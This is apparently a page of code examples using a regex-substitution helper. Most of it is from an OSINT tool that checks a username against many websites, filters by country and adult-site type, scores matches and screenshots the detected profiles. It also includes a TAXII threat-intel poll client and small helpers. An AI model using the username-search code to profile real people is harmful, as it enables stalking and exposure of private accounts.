                "slow": "normal,advanced,ocr",
                "detections": "true",
                "count": 1,
                "found": 2
            },
            "high": {
                "fast": "normal",
                "slow": "normal,advanced,ocr",
                "detections": "true,false",
                "count": 2,
                "found": 1
            },
            "current": "high"
        }

        temp_profile = {
            "found": 0,
            "image": "",
            "link": "",
            "rate": "",
            "title": "",
            "language": "",
            "text": "",
            "type": "",
            "good": "",
            "method": ""
        }

        for detection in site["detections"]:
            temp_found = "false"
            if detection['type'] in detection_level[
                    detection_level['current']]['fast'] and source != "":
                detections_count += 1
                if detection["string"].replace(
                        "{username}", username).lower() in source.lower():
                    temp_found = "true"
                if detection["return"] == temp_found:
                    temp_profile['found'] += 1

        if temp_profile['found'] >= detection_level[detection_level[
                'current']]['found'] and detections_count >= detection_level[
                    detection_level['current']]['count']:
            temp_profile['good'] = "true"

        with suppress(Exception):
            soup = BeautifulSoup(source, 'html.parser')
            [
                tag.extract() for tag in soup(
                    ['head', 'title', 'style', 'script', '[document]'])
            ]
            temp_profile["text"] = soup.getText()
            temp_profile["text"] = resub("\s\s+", " ", temp_profile["text"])
            temp_profile["text"] = temp_profile["text"].replace(
                "\n", "").replace("\t", "").replace("\r", "").strip()
        with suppress(Exception):
            temp_profile["language"] = get_language_by_parsing(source)
            if temp_profile["language"] == "unavailable":
                temp_profile["language"] = get_language_by_guessing(
                    temp_profile["text"])
        with suppress(Exception):
            temp_profile["title"] = BeautifulSoup(source,
                                                  'html.parser').title.string
            temp_profile["title"] = resub("\s\s+", " ", temp_profile["title"])
            temp_profile["title"] = temp_profile["title"].replace(
                "\n", "").replace("\t", "").replace("\r", "").strip()
        if temp_profile["text"] == "":
            temp_profile["text"] = "unavailable"
        if temp_profile["title"] == "":
            temp_profile["title"] = "unavailable"
        with suppress(Exception):
            temp_profile["rate"] = "%" + str(
                round(((temp_profile["found"] / detections_count) * 100), 2))

        temp_profile["link"] = site["url"].replace("{username}",
                                                   req["body"]["string"])
        temp_profile["type"] = site["type"]

        if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options:
            temp_profile['method'] = "find"
        elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options:
            temp_profile['method'] = "get"
        elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options:
            temp_profile['method'] = "all"

        copy_temp_profile = temp_profile.copy()
        return copy_temp_profile
Example #35
 def stripComment(self, text):
     """ Regex substitutions for comments; removes comment characters. """
     subText = lambda value, regex: resub(regex, '', value)
     for text in ifilter(unicode.strip, text.split('\n')):
         yield reduce(subText, self.commentSubs, text)
Example #36
def str2tupleunit(_str: str) -> tuple:
    """Convert measurement units from string to tuple"""
    pattern = r'([0-9.]+)([ _,]*)([A-Za-z/]+)'
    _num = resub(pattern, r'\1', _str)
    _unit = resub(pattern, r'\3', _str)
    return (_num, _unit)
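
For example (the regex matches the whole string, so each substitution keeps only the requested group):

    print(str2tupleunit("12.5 km/h"))  # ('12.5', 'km/h')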
Example #37
def one_line_xml(string):
    string = "".join(string.splitlines())
    string = resub("[>]\s+[<]", "><", string)
    string = string.strip()
    return string
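
For example:

    print(one_line_xml("<a>\n  <b/>\n</a>"))  # <a><b/></a>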
Example #38
def main():
    parser = scripts.get_base_parser("Poll Query Client", path="/services/poll/")
    parser.add_argument("--collection", dest="collection", default="default_queryable", help="Data Collection to poll. Defaults to 'default_queryable'.")
    parser.add_argument("--allow-asynch", dest="allow_asynch", default=True, help="Indicate whether or not the client support Asynchronous Polling. Defaults to True")
    parser.add_argument("--tev", dest="tev", default=t.CB_STIX_XML_111, help="Indicate which Targeting Expression Vocabulary is being used. Defaults to STIX XML 1.1.1")
    parser.add_argument("--target", dest="target", default="**/@id", help="The targeting expression to use. Defaults to **/@id (Any id, anywhere).")
    parser.add_argument("--rel", dest="relationship", default="equals", help="The relationship to use (e.g., equals). Defaults to equals.")
    parser.add_argument("--cm", dest="capability_module", default=None, help="The capability module being used. If not specified, the script will attempt to infer the correct capability module")
    # Parameters - optional depending on what relationship is chosen
    parser.add_argument("--value", dest=tdq.P_VALUE, default=None, help="The value to look for. Required (or not) and allowed values depend on the relationship.")
    parser.add_argument("--match-type", dest=tdq.P_MATCH_TYPE, default=None, choices=['case_sensitive_string', 'case_insensitive_string', 'number'], help="The match type. Required (or not) and allowed values depend on the relationship.")
    parser.add_argument("--case-sensitive", dest=tdq.P_CASE_SENSITIVE, default=None, choices=[True, False], help="Whether the match is case sensitive. Required (or not) and allowed values depend on the relationship.")

    args = parser.parse_args()

    capability_module = None
    relationship = None
    for cm_id, cm in tdq.capability_modules.iteritems():
        relationship = cm.relationships.get(args.relationship.lower(), None)

        if args.capability_module:  # The user specified a value - try to match on that
            if cm_id == args.capability_module:
                if not relationship:  # If the specified relationship is not in the capability module, that's an error
                    raise ValueError('Relationship (%s) not found in capability module (%s). Valid relationships are: %s' %
                                     (args.relationship, args.capability_module, cm.relationships.keys()))
                capability_module = cm
        elif relationship:  # User did not specify a value for capability_module, attempt to infer
            capability_module = cm

        if capability_module:
            break

    if not capability_module:
        raise ValueError("Unable to map relationship to Capability Module: %s" % args.relationship)

    # Make sure all required params are set and
    # no unused params are set

    tdq_params = {}

    for parameter in tdq.P_NAMES:
        param_obj = relationship.parameters.get(parameter, None)  # Will either be a parameter object or None
        param_value = getattr(args, parameter)  # Will either be a value or None

        if param_obj and not param_value:
            raise ValueError('The parameter "%s" is needed and was not specified. Specify using --%s <value>' % (parameter, parameter.replace('_', '-')))
        if param_value and not param_obj:
            raise ValueError('The parameter %s was specified and is not needed' % parameter)

        if param_obj:
            param_obj.verify(param_value)
            tdq_params[parameter] = param_value

    test = tdq.Test(capability_id=capability_module.capability_module_id,
                    relationship=relationship.name,
                    parameters=tdq_params)

    criterion = tdq.Criterion(target=args.target, test=test)

    criteria = tdq.Criteria(operator=tdq.OP_AND, criterion=[criterion])

    q = tdq.DefaultQuery(args.tev, criteria)

    poll_req = tm11.PollRequest(message_id=tm11.generate_message_id(),
                                collection_name=args.collection,
                                poll_parameters=tm11.PollRequest.PollParameters(allow_asynch=args.allow_asynch, query=q))

    print "Request:\n"
    if args.xml_output is False:
        print poll_req.to_text()
    else:
        print poll_req.to_xml(pretty_print=True)

    client = scripts.create_client(args)
    resp = client.call_taxii_service2(args.host, args.path, t.VID_TAXII_XML_11, poll_req.to_xml(pretty_print=True), args.port)
    r = t.get_message_from_http_response(resp, '0')

    print "Response:\n"
    if args.xml_output is False:
        print r.to_text()
    else:
        print r.to_xml(pretty_print=True)

    if r.message_type == tm11.MSG_POLL_RESPONSE:
        for cb in r.content_blocks:
            if cb.content_binding.binding_id == t.CB_STIX_XML_10:
                format = '_STIX10_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_101:
                format = '_STIX101_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_11:
                format = '_STIX11_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_111:
                format = '_STIX111_'
                ext = '.xml'
            else:  # Format and extension are unknown
                format = ''
                ext = ''

            if cb.timestamp_label:
                date_string = 't' + cb.timestamp_label.isoformat()
            else:
                date_string = 's' + datetime.datetime.now().isoformat()

            filename = (    r.collection_name.lstrip(".") +
                            format +
                            resub(r"[^a-zA-Z0-9]", "_", date_string) + ext
                            ).translate(None, '/\\:*?"<>|')
            filename = os.path.join(args.dest_dir, filename)

            f = open(filename, 'w')
            f.write(cb.content)
            f.flush()
            f.close()
            print "Wrote Content Block to %s" % filename
Example #39
	def fetch_url(site, username, options):
		sleep(randint(1, 99) / 100)
		LOG.info("[Checking] "+ get_fld(site["url"]))
		source = ""

		detection_level = {
		  "extreme": {
			"fast": "normal",
			"slow": "normal,advanced,ocr",
			"detections": "true",
			"count":1,
			"found":2
		  },
		  "high": {
			"fast": "normal",
			"slow": "normal,advanced,ocr",
			"detections": "true,false",
			"count":2,
			"found":1
		  },
		  "current":"high"
		}

		headers = {
			"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0",
		}


		try:
			response = get(site["url"].replace("{username}", username), timeout=5, headers=headers, verify=False)
			source = response.text
			response.close()
			text_only = "unavailable";
			title = "unavailable";
			temp_profile = {}
			temp_detected = {}
			detections_count = 0

			def merge_dicts(temp_dict):
				result = {}
				for item in temp_dict:
					for key, value in item.items():
						if key in result:
							result[key] += value
						else:
							result[key] = value
				return result

			def detect_logic(detections):
				detections_count = 0
				temp_detected = []
				temp_found = "false"
				temp_profile = {
				  "found": 0,
				  "image": "",
				  "link": "",
				  "rate": "",
				  "status":"",
				  "title": "unavailable",
				  "language": "unavailable",
				  "text": "unavailable",
				  "type": "unavailable",
				  "good":"",
				  "method":""
				}
				for detection in detections:
					temp_found = "false"
					if detection["type"] in detection_level[detection_level["current"]]["fast"] and source != "":
						detections_count += 1
						if detection["string"].replace("{username}", username).lower() in source.lower():
							temp_found = "true"
						if detection["return"] == temp_found:
							temp_profile["found"] += 1
				return temp_profile, temp_detected, detections_count

			def detect():
				temp_profile_all = []
				temp_detected_all = []
				detections_count_all = 0
				for detection in site["detections"]:
					detections_ = []
					if detection["type"] == "shared":
						detections_ = next(item for item in SHARED_DETECTIONS if item["name"] == detection['name'])
						if len(detections_) > 0:
							val1, val2, val3 = detect_logic(detections_["detections"])
							temp_profile_all.append(val1)
							detections_count_all += val3

				val1, val2, val3 = detect_logic(site["detections"])
				temp_profile_all.append(val1)
				detections_count_all += val3
				return merge_dicts(temp_profile_all), temp_detected_all, detections_count_all

			temp_profile, temp_detected, detections_count = detect()

			if temp_profile["found"] >= detection_level[detection_level["current"]]["found"] and detections_count >= detection_level[detection_level["current"]]["count"]:
				temp_profile["good"] = "true"

			with suppress(Exception):
				soup = BeautifulSoup(source, "html.parser")
				[tag.extract() for tag in soup(["head", "title","style", "script", "[document]"])]
				temp_profile["text"] = soup.getText()
				temp_profile["text"] = resub("\s\s+", " ", temp_profile["text"])
			with suppress(Exception):
				temp_profile["language"] = get_language_by_parsing(source)
				if temp_profile["language"] == "unavailable":
					temp_profile["language"] = get_language_by_guessing(temp_profile["text"])
			with suppress(Exception):
				temp_profile["title"] = BeautifulSoup(source, "html.parser").title.string
				temp_profile["title"] = resub("\s\s+", " ", temp_profile["title"])

			temp_profile["text"] = temp_profile["text"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
			temp_profile["title"] = temp_profile["title"].replace("\n", "").replace("\t", "").replace("\r", "").strip()

			if temp_profile["text"] == "":
				temp_profile["text"] = "unavailable"
			with suppress(Exception):
				if detections_count != 0:
					temp_value = round(((temp_profile["found"] / detections_count) * 100), 2)
					temp_profile["rate"] = "%" + str(temp_value)
					if temp_value >= 100.00:
						temp_profile["status"] = "good"
					elif temp_value >= 50.00 and temp_value < 100.00:
						temp_profile["status"] = "maybe"
					else:
						temp_profile["status"] = "bad"

			temp_profile["link"] = site["url"].replace("{username}", req["body"]["string"]);
			temp_profile["type"] = site["type"]

			if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options:
				temp_profile["method"] = "find"
			elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options:
				temp_profile["method"] = "get"
			elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options:
				temp_profile["method"] = "all"

			copy_temp_profile = temp_profile.copy()
			return 1,site["url"], copy_temp_profile
		except Exception as e:
			pass

		return None,site["url"],[]
Example #40
    def check_user_cli(self, argv):
        '''
        main cli logic
        '''

        temp_detected = {"detected": [], "unknown": [], "failed": []}
        temp_options = "GetUserProfilesFast,FindUserProfilesFast"
        if argv.method != "":
            if argv.method == "find":
                temp_options = "FindUserProfilesFast"
            if argv.method == "get":
                temp_options = "GetUserProfilesFast"

        req = {"body": {"uuid": str(uuid4()), "string": argv.username, "options": temp_options}}
        self.setup_logger(uuid=req["body"]["uuid"], file=True, argv=argv)
        self.init_logic()

        if argv.cli:
            if not self.silent:
                self.log.info("[Warning] --cli is not needed and will be removed later on")

        for site in self.websites_entries:
            site["selected"] = "false"

        if argv.websites == "all":
            list_of_countries = []
            if argv.countries != "all":
                list_of_countries = argv.countries.split(" ")
                for site in self.websites_entries:
                    if site["country"] != "" and site["country"].lower() in list_of_countries:
                        site["selected"] = "true"
                    else:
                        site["selected"] = "false"
            else:
                for site in self.websites_entries:
                    site["selected"] = "true"

            if argv.type != "all":
                sites = ([d for d in self.websites_entries if d.get('selected') == "true"])
                if "adult" in argv.type.lower():
                    for site in sites:
                        if "adult" in site["type"].lower():
                            self.search_and_change(site, {"selected": "pendding"})
                for site in self.websites_entries:
                    if site["selected"] == "pendding":
                        site["selected"] = "true"
                    else:
                        site["selected"] = "false"

            if int(argv.top) != 0:
                sites = ([d for d in self.websites_entries if d.get('selected') == "true"])
                sites = ([d for d in sites if d.get('global_rank') != 0])
                sites = sorted(sites, key=lambda x: x['global_rank'])
                for site in sites[:int(argv.top)]:
                    self.search_and_change(site, {"selected": "pendding"})
                for site in self.websites_entries:
                    if site["selected"] == "pendding":
                        site["selected"] = "true"
                    else:
                        site["selected"] = "false"
        else:
            for site in self.websites_entries:
                for temp in argv.websites.split(" "):
                    if temp in site["url"]:
                        site["selected"] = "true"

        true_websites = 0
        for site in self.websites_entries:
            if site["selected"] == "true":
                true_websites += 1

        if not self.silent:
            self.log.info("[Init] Selected websites: {}".format(true_websites))
        results = self.find_username_normal(req)

        for item in results:
            if item is not None:
                if item["method"] == "all":
                    if item["good"] == "true":
                        item = self.delete_keys(item, ["method", "good"])
                        item = self.clean_up_item(item, argv.options)
                        temp_detected["detected"].append(item)
                    else:
                        item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"])
                        item = self.clean_up_item(item, argv.options)
                        temp_detected["unknown"].append(item)
                elif item["method"] == "find":
                    if item["good"] == "true":
                        item = self.delete_keys(item, ["method", "good"])
                        item = self.clean_up_item(item, argv.options)
                        temp_detected["detected"].append(item)
                elif item["method"] == "get":
                    item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"])
                    item = self.clean_up_item(item, argv.options)
                    temp_detected["unknown"].append(item)
                else:
                    item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "title", "language", "rate", "extracted", "metadata"])
                    item = self.clean_up_item(item, argv.options)
                    temp_detected["failed"].append(item)

        with suppress(Exception):
            if len(temp_detected["detected"]) == 0:
                del temp_detected["detected"]
            else:
                if "all" in argv.profiles or "detected" in argv.profiles:
                    if argv.filter == "all":
                        pass
                    else:
                        temp_detected["detected"] = [item for item in temp_detected["detected"] if item['status'] in argv.filter]
                    if len(temp_detected["detected"]) > 0:
                        temp_detected["detected"] = sorted(temp_detected["detected"], key=lambda k: float(k['rate'].strip('%')), reverse=True)
                    else:
                        del temp_detected["detected"]
                else:
                    del temp_detected["detected"]

            if len(temp_detected["unknown"]) == 0:
                del temp_detected["unknown"]
            else:
                if "all" in argv.profiles or "unknown" in argv.profiles:
                    pass
                else:
                    del temp_detected["unknown"]

            if len(temp_detected["failed"]) == 0:
                del temp_detected["failed"]
            else:
                if "all" in argv.profiles or "failed" in argv.profiles:
                    pass
                else:
                    del temp_detected["failed"]

        if argv.output == "pretty" or argv.output == "":
            if 'detected' in temp_detected:
                if not self.silent:
                    self.log.info("[Detected] {} Profile[s]".format(len(temp_detected['detected'])))
            if 'unknown' in temp_detected:
                if not self.silent:
                    self.log.info("[unknown] {} Profile[s]".format(len(temp_detected['unknown'])))
            if 'failed' in temp_detected:
                if not self.silent:
                    self.log.info("[failed] {} Profile[s]".format(len(temp_detected['failed'])))

        if "detected" in temp_detected:
            if self.screenshots and self.screenshots_location:
                location = None
                with suppress(Exception):
                    if not self.silent:
                        self.log.info("[Info] Getting screenshots of {} profiles".format(len([item['link'] for item in temp_detected["detected"]])))
                with suppress(Exception):
                    g = Galeodes(browser="chrome", arguments=['--headless', self.headers['User-Agent']], options=None, implicit_wait=5, verbose=False)
                    results = g.get_pages(urls=[item['link'] for item in temp_detected["detected"]], screenshots=True, number_of_workers=10, format='jpeg', base64=False)
                    for item in results:
                        if item['image'] is not None:
                            with suppress(Exception):
                                file_name = resub(r'[^\w\d-]', '_', item['url']) + '.jpeg'
                                with open(path.join(self.screenshots_location, file_name), 'wb') as f:
                                    f.write(item['image'])
                                    location = self.screenshots_location
                if location:
                    if not self.silent:
                        self.log.info("[Info] Screenshots location {}".format(location))

        if argv.output == "pretty" or argv.output == "":
            if 'detected' in temp_detected:
                if not self.silent:
                    self.log.info({"custom": temp_detected['detected']})
            if 'unknown' in temp_detected:
                if not self.silent:
                    self.log.info({"custom": temp_detected['unknown']})
            if 'failed' in temp_detected:
                if not self.silent:
                    self.log.info({"custom": temp_detected['failed']})

        if argv.output == "json":
            if not self.silent:
                self.log.info(dumps(temp_detected, sort_keys=True, indent=None))

        return temp_detected